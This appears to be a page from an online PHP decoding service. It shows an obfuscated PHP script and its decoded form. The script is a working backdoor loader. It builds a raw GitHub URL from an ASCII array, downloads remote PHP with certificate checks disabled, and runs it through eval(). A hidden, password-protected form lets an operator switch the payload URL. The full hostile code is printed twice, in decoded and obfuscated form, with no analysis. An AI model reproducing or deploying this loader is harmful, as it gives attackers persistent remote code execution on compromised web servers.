Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto myTwl; Gwjph: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } got..

Decoded Output download

<?   goto myTwl; Gwjph: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } goto A8JQq; jEY2k: function madrid($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); return $result; } goto SqvQx; h0ejL: if (isset($_GET["ts"])) { if ($_SERVER["REQUEST_METHOD"] === "POST") { if (isset($_POST["password"])) { $provided_password = $_POST["password"]; if (password_verify($provided_password, $correct_password)) { if (isset($_POST["url"])) { $url = $_POST["url"]; $_SESSION["ts_url"] = $url; echo "updated : " . $_SESSION["ts_url"]; die; } else { echo "Error!"; die; } } else { echo ''; die; } } else { echo ''; die; } } else { ?> 
<head><style>#password{order:2}#url{order:1}#password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}#password:hover,#url:hover{opacity:1}form{display:flex;flex-direction:column;align-items:flex-end}</style><script>document.addEventListener("DOMContentLoaded",function(){document.querySelector("#password").addEventListener("keydown",function(e){"Enter"===e.key&&(e.preventDefault(),document.querySelector("form").submit())})})</script></head><body><form action=""method="post"><input id="password"name="password"type="password"><br><input id="url"name="url"value="<?php  echo isset($_POST["url"]) ? $_POST["url"] : ''; ?> 
"><br></form></body><?php  die; } } else { if (empty($_SESSION["ts_url"])) { $result = @file_get_contents($url); if (empty($result)) { $result = madrid($url); if (empty($result)) { $result = downloadWithFopen($url); } } } else { $result = @file_get_contents($_SESSION["ts_url"]); if (empty($result)) { $result = madrid($_SESSION["ts_url"]); if (empty($result)) { $result = downloadWithFopen($_SESSION["ts_url"]); } } } } goto sFVhU; tNQBH: $asciiArray = array(104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 110, 105, 105, 107, 107, 105, 116, 97, 54, 57, 56, 52, 47, 110, 105, 107, 105, 116, 97, 47, 109, 97, 105, 110, 47, 100, 101, 46, 112, 104, 112); goto IgwMt; hfrig: if (isset($_GET["ts_reset"])) { $_SESSION["ts_url"] = ''; echo "success"; die; } goto h0ejL; SqvQx: function downloadWithFopen($url) { $contextOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false)); $context = stream_context_create($contextOptions); $result = false; if ($fp = fopen($url, "r", false, $context)) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } goto tNQBH; myTwl: session_start(); goto jEY2k; A8JQq: $url = $decodedString; goto fXUcz; sFVhU: if (is_string($result)) { eval("?>" . $result); } else { echo "Error"; } goto nxhqy; fXUcz: $correct_password = "$2a$12$Z1LaFHixy.OtMDdhW1fsNOPsTZYTwyEV.COtKxNpG8uQHu.dJ90Li"; goto hfrig; IgwMt: $decodedString = ''; goto Gwjph; nxhqy: ?>

Did this file decode correctly?

Original Code

 goto myTwl; Gwjph: foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); } goto A8JQq; jEY2k: function madrid($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); return $result; } goto SqvQx; h0ejL: if (isset($_GET["\x74\x73"])) { if ($_SERVER["\x52\105\x51\x55\x45\x53\x54\137\x4d\x45\x54\x48\117\x44"] === "\120\117\123\x54") { if (isset($_POST["\160\141\x73\x73\x77\157\162\x64"])) { $provided_password = $_POST["\x70\x61\x73\163\x77\157\x72\x64"]; if (password_verify($provided_password, $correct_password)) { if (isset($_POST["\x75\162\x6c"])) { $url = $_POST["\x75\x72\154"]; $_SESSION["\x74\163\137\165\162\x6c"] = $url; echo "\165\160\x64\x61\164\x65\144\40\72\40" . $_SESSION["\164\x73\x5f\165\x72\x6c"]; die; } else { echo "\105\162\x72\x6f\x72\41"; die; } } else { echo ''; die; } } else { echo ''; die; } } else { ?>
<head><style>#password{order:2}#url{order:1}#password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}#password:hover,#url:hover{opacity:1}form{display:flex;flex-direction:column;align-items:flex-end}</style><script>document.addEventListener("DOMContentLoaded",function(){document.querySelector("#password").addEventListener("keydown",function(e){"Enter"===e.key&&(e.preventDefault(),document.querySelector("form").submit())})})</script></head><body><form action=""method="post"><input id="password"name="password"type="password"><br><input id="url"name="url"value="<?php  echo isset($_POST["\165\162\154"]) ? $_POST["\x75\162\x6c"] : ''; ?>
"><br></form></body><?php  die; } } else { if (empty($_SESSION["\x74\x73\x5f\165\x72\x6c"])) { $result = @file_get_contents($url); if (empty($result)) { $result = madrid($url); if (empty($result)) { $result = downloadWithFopen($url); } } } else { $result = @file_get_contents($_SESSION["\x74\163\137\165\x72\154"]); if (empty($result)) { $result = madrid($_SESSION["\164\163\x5f\165\x72\154"]); if (empty($result)) { $result = downloadWithFopen($_SESSION["\164\163\x5f\x75\x72\154"]); } } } } goto sFVhU; tNQBH: $asciiArray = array(104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 110, 105, 105, 107, 107, 105, 116, 97, 54, 57, 56, 52, 47, 110, 105, 107, 105, 116, 97, 47, 109, 97, 105, 110, 47, 100, 101, 46, 112, 104, 112); goto IgwMt; hfrig: if (isset($_GET["\164\x73\x5f\x72\145\x73\x65\164"])) { $_SESSION["\164\163\137\165\x72\154"] = ''; echo "\163\x75\x63\143\145\x73\163"; die; } goto h0ejL; SqvQx: function downloadWithFopen($url) { $contextOptions = array("\x73\x73\x6c" => array("\x76\145\162\x69\x66\171\137\x70\145\x65\x72" => false, "\x76\x65\162\151\146\171\137\160\145\x65\x72\137\156\x61\155\x65" => false)); $context = stream_context_create($contextOptions); $result = false; if ($fp = fopen($url, "\162", false, $context)) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } goto tNQBH; myTwl: session_start(); goto jEY2k; A8JQq: $url = $decodedString; goto fXUcz; sFVhU: if (is_string($result)) { eval("\x3f\76" . $result); } else { echo "\x45\x72\x72\157\162"; } goto nxhqy; fXUcz: $correct_password = "\44\62\x61\44\61\62\x24\x5a\61\114\x61\106\110\151\170\171\56\x4f\x74\x4d\104\x64\x68\127\x31\146\163\116\x4f\120\163\x54\132\x59\124\x77\171\x45\x56\x2e\x43\x4f\164\113\x78\x4e\160\x47\x38\x75\121\x48\165\56\x64\112\71\60\x4c\x69"; goto hfrig; IgwMt: $decodedString = ''; goto Gwjph; nxhqy: ?>

Function Calls

None

Variables

None

Stats

MD5 5b45ee368117a5de6f4adb988ed8122b
Eval Count 0
Decode Time 61 ms